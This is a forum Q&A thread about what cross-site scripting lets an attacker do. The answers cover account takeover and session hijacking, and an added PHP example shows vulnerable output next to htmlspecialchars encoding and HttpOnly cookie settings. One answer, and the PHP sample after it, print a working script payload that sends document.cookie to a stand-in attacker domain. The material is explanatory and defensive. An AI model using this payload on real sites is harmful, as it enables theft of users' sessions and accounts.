views: 116

answers: 5

Hey,

So, preventing a website from an XSS attack is very simple, you just need to use the htmlspecialchars function and you are good.
But if the developer forgot to use it, what can an attacker/hacker do? He can get your session_id, right? And here is the question. What can he do with that?
Thank you very much.

A: 

Start reading about XSS here: http://en.wikipedia.org/wiki/XSS and http://en.wikipedia.org/wiki/Cross-site_scripting

Kangkan
A: 

Attacker A gets member B to access site C with B's credentials via A's carefully constructed URI.

A can then run any JS they like on C using B's credentials.

This allows them to:

  • Present any information they like to B as if it came from C
  • Get B's browser to send any information they want from C to A
    • Account details
    • Private information
  • Send any instruction to site C as if it came from A
    • Publish this spam
    • Transfer money to this account
    • Buy this very expensive eBook
David Dorward
A: 

If you have an XSS vulnerability on your web site, then a hacker can insert any HTML into the page, including a <script> tag. If I'm logged in to your web site and visit the attacked page, my browser will run the JavaScript inserted there by the hacker and make my browser do whatever the hacker intended.

Such as sending a POST request to your server to change my password, then loading a URL from the hacker's server to notify him of my account number so he can log on and steal my account.

Victor Nicollet
+3  A: 

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.

Right. Use it anywhere you're going to redisplay user-controlled input. This concerns all parts of the HTTP request: headers, body and parameters.

But if developer forgot to use it, what can attacker/hacker do?

S/he can insert some malicious HTML/script, e.g. the following in some message/comment on a webpage:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>

The above will request an image from the malicious domain along with the document cookie as the query string.

He can get your session_id, right? And here is a question. What can he do with that?

The session ID is stored in a cookie. Once the hacker is notified that an image has been requested with the cookie in the query string, all s/he has to do is edit the browser's cookies to include the same session ID to get logged in as the original user. This is obviously very dangerous if the original user is the site admin.

BalusC
Thanks, you are a hero. Very informative.
hey
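BalusC's answer put into code, as an added example that is not from the original thread: the echo that lets the injected script run, the htmlspecialchars() version that neutralises it, and the session-cookie settings that stop document.cookie from exposing the session ID in the first place. The stored comment is a constructed sample holding the payload quoted above; there is no real database or site behind it.

```php
<?php
// Constructed sample of attacker-controlled text as it might sit in the
// comments table (the payload from the answer above).
$comment = '<script>document.write(\'<img src="http://hackersdomain.com/fake.gif?\' '
         . '+ escape(document.cookie) + \'" width=0 height=0>\');</script>';

// VULNERABLE: user input is written straight into the page, so the browser
// executes the <script> and sends document.cookie to the attacker's host.
function render_comment_vulnerable(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

// HARDENED: encode for an HTML context. ENT_QUOTES also encodes the single
// quote, which matters whenever the same helper is reused inside an attribute
// value; the explicit charset avoids multi-byte encoding tricks.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_comment_hardened(string $comment): string
{
    // Attribute values must be quoted; encoding alone is not enough in an
    // unquoted attribute, and htmlspecialchars() does not make text safe
    // inside a <script> block or a javascript: URL at all.
    return '<div class="comment" title="' . h($comment) . '">' . h($comment) . '</div>';
}

// Defence in depth for the session cookie itself. With HttpOnly set the browser
// hides the cookie from document.cookie, so even a successful injection cannot
// read the session ID this way. These must be set before session_start().
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');    // only send the cookie over HTTPS
ini_set('session.use_only_cookies', '1'); // never accept a session ID from the URL
session_start();

// The encoded markup is displayed as literal text instead of being executed.
echo render_comment_hardened($comment), "\n";
```

Regenerating the session ID with session_regenerate_id(true) after login, and invalidating it on logout, limits how long a stolen ID stays usable even when the other measures fail.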
+2  A: 

This is the best explanation of XSS I have ever run into: Flash Animation Example

Here's the Second Video

myermian
Very nice video indeed.
hey